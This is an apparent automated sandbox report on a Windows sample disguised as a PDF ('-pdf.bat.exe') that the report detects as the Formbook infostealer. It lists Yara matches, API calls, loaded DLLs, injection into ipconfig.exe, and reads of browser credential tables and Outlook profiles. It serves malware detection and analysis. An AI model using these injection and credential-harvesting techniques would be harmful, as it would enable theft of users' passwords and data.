        Source: ipconfig.exe, 00000004.00000003.38580790536.000000000362C000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.0000000003623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: ipconfig.exe, 00000004.00000003.38579786357.000000000851B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownHTTPS traffic detected: 185.86.211.136:443 -> 192.168.11.20:49728 version: TLS 1.2
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00404C33 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404C33

        E-Banking Fraud

        Source: Yara match File source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_326634E0 NtCreateMutant,LdrInitializeThunk,2_2_326634E0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_32662B90
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_32662D10
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32664260 NtSetContextThread,2_2_32664260
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32664570 NtSuspendThread,2_2_32664570
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662A10 NtWriteFile,2_2_32662A10
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662AC0 NtEnumerateValueKey,2_2_32662AC0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662AA0 NtQueryInformationFile,2_2_32662AA0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662A80 NtClose,2_2_32662A80
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662B20 NtQueryInformationProcess,2_2_32662B20
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662B00 NtQueryValueKey,2_2_32662B00
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662B10 NtAllocateVirtualMemory,2_2_32662B10
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662BE0 NtQueryVirtualMemory,2_2_32662BE0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662BC0 NtQueryInformationToken,2_2_32662BC0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662B80 NtCreateKey,2_2_32662B80
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_326638D0 NtGetContextThread,2_2_326638D0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_326629F0 NtReadFile,2_2_326629F0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_326629D0 NtWaitForSingleObject,2_2_326629D0
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 2_2_32662E50 NtCreateSection,2_2_32662E50
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 0_2_00403804 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,0_2_00403804
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: String function: 32677BE4 appears 58 times
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: String function: 3261B910 appears 168 times
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: String function: 326AEF10 appears 60 times
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: String function: 3269E692 appears 43 times
        Source: -pdf.bat.exe, 00000000.00000000.37678685942.0000000000490000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesloffens.exeDVarFileInfo$ vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000002.38153091093.00000000328C0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38051427415.00000000323BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38054661347.0000000032574000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameipconfig.exej% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000000.37860102631.0000000000490000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesloffens.exeDVarFileInfo$ vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameipconfig.exej% vs -pdf.bat.exe
        Source: -pdf.bat.exe Binary or memory string: OriginalFilenamesloffens.exeDVarFileInfo$ vs -pdf.bat.exe
        Source: -pdf.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/7@18/12
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 0_2_00404188 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,EnableWindow,0_2_00404188
        Source: C:\Users\user\Desktop\-pdf.bat.exe Code function: 0_2_0040234F LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040234F
        Source: C:\Users\user\Desktop\-pdf.bat.exe File created: C:\Users\user\AppData\Local\Anvilled
        Source: C:\Users\user\Desktop\-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsx5EF9.tmp
        Source: -pdf.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\-pdf.bat.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\-pdf.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: ipconfig.exe, 00000004.00000002.42209827206.0000000008549000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.0000000008540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: ipconfig.exe, 00000004.00000003.38580690753.000000000363E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: ipconfig.exe, 00000004.00000003.38589208982.000000000859E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42209827206.00000000085AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: -pdf.bat.exe ReversingLabs: Detection: 23%
        Source: -pdf.bat.exe Virustotal: Detection: 26%
        Source: C:\Users\user\Desktop\-pdf.bat.exe File read: C:\Users\user\Desktop\-pdf.bat.exe
        Source: unknown Process created: C:\Users\user\Desktop\-pdf.bat.exe "C:\Users\user\Desktop\-pdf.bat.exe"
        Source: C:\Users\user\Desktop\-pdf.bat.exe Process created: C:\Users\user\Desktop\-pdf.bat.exe "C:\Users\user\Desktop\-pdf.bat.exe"
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exe Process created: unknown unknown
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: -pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
